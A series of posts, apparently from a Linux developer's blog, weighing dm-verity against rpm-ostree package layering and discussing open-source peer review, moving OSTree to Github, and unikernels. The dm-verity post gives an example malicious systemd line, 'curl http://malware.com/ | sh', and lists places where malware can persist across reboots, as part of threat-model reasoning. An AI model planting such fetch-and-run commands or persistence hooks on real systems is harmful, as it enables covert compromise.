On Android, apps are “unprivileged” or non root software, without Linux capabilities. But from a user perspective of course, applications can do quite a lot; similar to the WiFi camera case, attackers are likely perfectly happy injecting “unprivileged” Android applications that can monitor your location, microphone etc. Besides the well-known issues with Android devices not receiving security updates, there is a good example of a privilege escalation issue in Android called Cloak And Dagger; applications can exploit the accessibility framework to escalate their privileges, including full keystroke recording.

That said, persisting in an application does increase the chance an attacker could be detected. And if one suspects an Android device is compromised, dm-verity does provide value in that one can do a factory reset, and a bit like the WiFi camera scenario, do an OS update (before reinstalling apps), and have some confidence that the malware hasn’t persisted.

Dm-verity on full general purpose systems

A fully general purpose operating system needs to allow the installation of privileged code as well. An example of an OS that uses dm-verity and allows 3rd party code to execute with full (i.e. Linux CAP_SYS_ADMIN privileges) is CoreOS (yes, I know they renamed it to “Container Linux” but sorry, I think that’s silly, I’m going to keep calling it “CoreOS” 😃 ).

Installing a tool like Kubernetes on top of CoreOS requires it to be fully privileged to do its job (specifically the kubelet). Having a mechanism to install privileged software persistently means that same mechanism can be used by malware. While it’s true the malware doesn’t need to live in the /usr directory, unlike the non-configurable camera scenario, a software update and reboot isn’t going to fix things.

Also on CoreOS, attackers can write fully privileged unit files in /etc/systemd/system/, or the classic Unix things writing /root/.bashrc. These are all places where malware can persist across reboots. dm-verity in theory does make detection easier – but most system administrators are going to find it easier to simply re-provision their systems, and not look carefully at all of the files in /etc.

Ostree-style flexibility vs fixed block devices

Now let’s examine what an ostree-based system like Fedora Atomic Host does to help with preventing these types of hacks? Unfortunately, the answer is nothing! Atomic Host systems are equally general purpose. Since you can e.g. configure the system to set a HTTP proxy, and attacker could create a systemd unit file that runs ExecStart=curl http://malware.com/ | sh. Further, the OS data in /sysroot/ostree/repo isn’t verity protected; it’s just data in a filesystem, just like RPMs/debs etc. And for that matter, just like Docker overlay2 container files.

Why not implement dm-verity anyways? The answer is that I think it’s more valuable to have 3rd party software installation more tightly integrated with the host. We’re working on system containers for Kubernetes for example – these system containers have part of their configuration on the host, and configuration files down the line are going to be tracked by RPM. And outside of the container space, rpm-ostree supports “package layering”, which brings the best features of image update systems with the flexibility of package systems. You can use package layering to install privileged software like PAM modules, kernel drivers and the like. We recently landed the first experimental support for live system updates. This would be technically much harder if we operated at the block level, which dm-verity would force us into. Not to mention deep questions around signing of the bootable hash.

Package layering is crucial to provide flexiblity for “small scale” or “pet” machines. rpm-ostree allows you to use yum/apt/zypper style workflows,, and still get the benefits of image-like approaches. Such as known-good “base image”, transactional updates and “offline” updates. For example, with rpm-ostree you can uninstall your layered packages, and this will return the system to exactly to the “base image” in /usr.

Some people I’ve talked to about package layering don’t like the idea of still doing package installs per-machine. This is often the “large scale identical machine” cases – racks of identical servers (or at least ones that can use the same OS image), and “corporate standard build” laptops. In the large scale server case, organizations would prefer doing a “custom compose”, baking in their configuration to the images.

This goes back to a potential dm-verity scenario; in this model, we’d really want /etc to be immutable at runtime. Traditional files that need to be modified at runtime under /etc like /etc/resolv.conf would be a symlink into /run. Other “persistence vectors” like /usr/local and /root would need to be verity-protected too. The only writable, persistent filesystem should be /var. We’d also need to audit the operating system to make sure that no code can live in /var. A quick inspection shows there’d be work to do here; for example, I suspect /var/cache/ldconfig/aux-cache is used by the dynamic linker. There’s also /var/lib/alternatives. Hm, I notice my workstation has/var/spool/at – a cron job would be an excellent persistence vector too.

This sounds relatively doable. Get rid of things like at (Fedora Atomic Host already doesn’t have either the legacy cron or at – we suggest people use systemd timers). Moving that type of configuration underneath either /etc or /usr, which is what the “systemd config model” does, and those directories are read-only at runtime.

But going back to the high level – for general purpose operating systems, I’d take the flexibility of rpm-ostree’s dynamic package layering over having dm-verity for just a subset of privileged code. Being able to seamlessly install utilities on the host is very useful. We’ve even landed some recent work on replacing parts of the “base image”. I don’t want to build a new OS image every time I wanted to test a new version of docker or systemd, at least in a dev/test cycle.

I think there’s a spectrum here – with the “ostree model” enforcing read-only constraints around /usr, we are supporting iteration towards the more locked down “verity appliance” style devices. I know there are both ostree (and rpm-ostree) users today who are willing to drop some of the flexibility for increased security. If you’re one of those, please do follow the upstream issues linked above!

Concretely, you could build a tool that takes a kickstart configuration (your requested partitioning, time zone, etc.) plus generic %post style configuration (extra PAM tweaks, Docker registries), plus layered packages, plus container images, (and container runtime configuration?) and put all of that into a disk image, signed with dm-verity.

A challenge here is a lot of organizations are going to want branching. If one wants to update to a new version of Kubernetes/OpenShift, that would require a new image build. Organizations are going to want multiple active versions, to try out new OS builds in staging. Changing any configuration file that lives in /etc would also be a new image build. There are clearly files in /etc where a “heavyweight” change process could make sense; for example, the CA trust roots in /etc/pki.

Back to my original thesis, the dm-verity approach is best for IoT/appliance devices with truly limited configuration. As soon as you have any persistent place to write configuration/code that isn’t verity protected, its value drops.

Peer review, FOSS, and packaging/containers etc

Lately whenever I give a presentation, I often at least briefly mention one of my primary motivations for doing what I do:  I really like working in global community of people on Free Software.

A concrete artifact of that work is the code landing in git repositories.  But I believe it’s not just about landing code – peer review is a fundamental ingredient.

Many projects of course start out as just one person scratching an itch or having fun.  And it’s completely fine for many to stay that way.  But once a project reaches a certain level of maturity and widespread usage, I think it’s generally best for the original author to “step down” and become a peer.  That’s what I’ve now done for the OSTree project.

In other words, landing code in git master for a mature project should require at least one other person to look at it.  This may sound obvious, but you’d be surprised…there are some very critical projects that don’t have much the way of peer review.

To call out probably the most egregious example, the bash shell.  I’m deliberately linking to their “git log” because it violates all modern standards for git commit messages.  Now,  I don’t want to overly fault Chet for the years and years he’s put into maintaining the Bash project on his own time.  His contribution to Free Software is great and deserves recognition and applause.  But I believe that getting code into bash should involve more than just him replying to a mail message and running git push.  Bash isn’t the only example of this in what I would call the “Linux distribution core”.

Another major area where there are gaps are the “language ecosystems like Node.js, Rust’s cargo, Python’s pip etc.  Many projects on there are “one person scratching an itch” that other people mostly just consume.

There’s no magical solution to this – but in e.g. the language ecosystem case, if you happen to maintain a library which depends on another one, maybe consider spending a bit of your time looking at open pull requests and jumping in with review?

A vast topic related to this is “who is qualified to review” and “how intensively do I review”, but I think some qualified people are too timid about this – basically it’s much better to have a lightweight but shallow process than none at all.

Now finally, I included “packaging” in the title of this blog, so how does that relate?  It’s pretty simple, I also claim that most people doing what is today known as “packaging” should sign up to participate in upstream peer review.  Things like build fixes should go upstream rather than being kept downstream.  And if upstream doesn’t have peer review, reconsider packaging it – or help ensure peer review happens upstream!

 

 

Github, accounts, and ease of contribution

At the moment we’re making plans to move OSTree to Github (from GNOME), and while there are a few reasons for this, one thing I want to talk about is the “account problem” and specifically how it relates to free and open source software.

The “account problem” is simply that requiring users to create them is a barrier to contribution.   It’s problematic to require people to have a Sourceforge account, a GNOME account, a Github account, an Apache Bugzilla account, a Fedora/CentOS account, etc.  People who are committed to making a larger contribution can obviously easily overcome this, but for smaller contributions it hurts.

Particularly for projects like GNOME that have distinct accounts for bugzilla and commit.  Having to create an account just to file a bug is bad.  Yes, there’s OpenID, but still.

I’ll note at this point that software freedom is quite important to me, and the fact that Github is proprietary software is a problem.  But – making it easy for people to contribute to Free Software is also a major benefit.

I wonder how things would have turned out if Sourceforge had been…well, let’s say “less crappy”.  Anyways, now we have Github.

And when we move OSTree, I’d like to avoid becoming too dependent on it.  Particularly for things that aren’t actually git, like the issue tracker. Hopefully if GNOME doesn’t disagree, we’ll maintain our mailing list and bugzilla there so that people who prefer that can use it.

But allowing people to create Github PRs easily is really critical in my mind.  (On this topic, we are also planning to use the Homu bot, which I really like)

 

Thoughts on unikernels/rump kernels

I spend most of my time working on Project Atomic to further Linux containers deriving from a traditional upstream Linux distribution model, but the space of software delivery/runtime mechanisms is vast, and in particular, I have thought Unikernels were an interesting development.   While I do like writing C, the thought of an OS/library in a high level language is an interesting one (particularly interesting to me for a long time is how garbage collection could be better if integrated with the OS).

That was before Docker, Inc. acquired a unikernel company – now, I’m certainly curious where they’re going to go with it.

My thoughts before this were that the Unikernel model might make sense in the scenario where you have a “large” application and your sole deployment target is required to be virtualized (e.g. AWS, GCE, etc.).

In this case, it’s not really possible to share anything between virtual machines directly (modulo KSM and similar ad-hoc techniques which cost CPU and aren’t always predictable) – and so because you can’t share anything between these apps, it could gain you efficiency to dump the parts of the OS and userspace that you aren’t using in that VM, which could be a lot.

But, if you have any smaller microservice applications, it seems to me that having a shared kernel and userspace (as we provide with the Project Atomic and OpenShift 3 models) is going to be a lot more efficient than doing a VM-per-microservice, even if your VMs are unikernels.

And even with the “large app only for virt” scenario, what about debugging?  Ah yes, I just found a blog from Bryan Cantrill on this topic, and I have to say I agree.

Still though, there’s lots of middle ground here.  We can do far better at helping application authors to produce smaller apps (and host images) than we are with Docker normally right now, for example.